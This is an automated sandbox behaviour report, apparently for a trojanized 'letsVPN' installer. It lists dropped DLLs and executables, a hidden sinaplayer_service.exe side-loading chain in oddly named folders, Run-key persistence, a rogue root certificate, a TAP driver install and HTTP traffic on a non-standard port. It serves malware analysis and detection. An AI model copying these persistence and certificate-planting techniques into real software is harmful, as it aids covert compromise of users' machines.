              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\letsvpn-latest.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsProcess.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\base.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETBDCE.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsDialogs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsExec.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dllJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\base.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcr120.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcp120.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\letsvpn-latest.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETBDCE.tmpJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmpJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\Windows\System32\drvinst.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
              Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 15628
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D70 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0000000180010D70
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
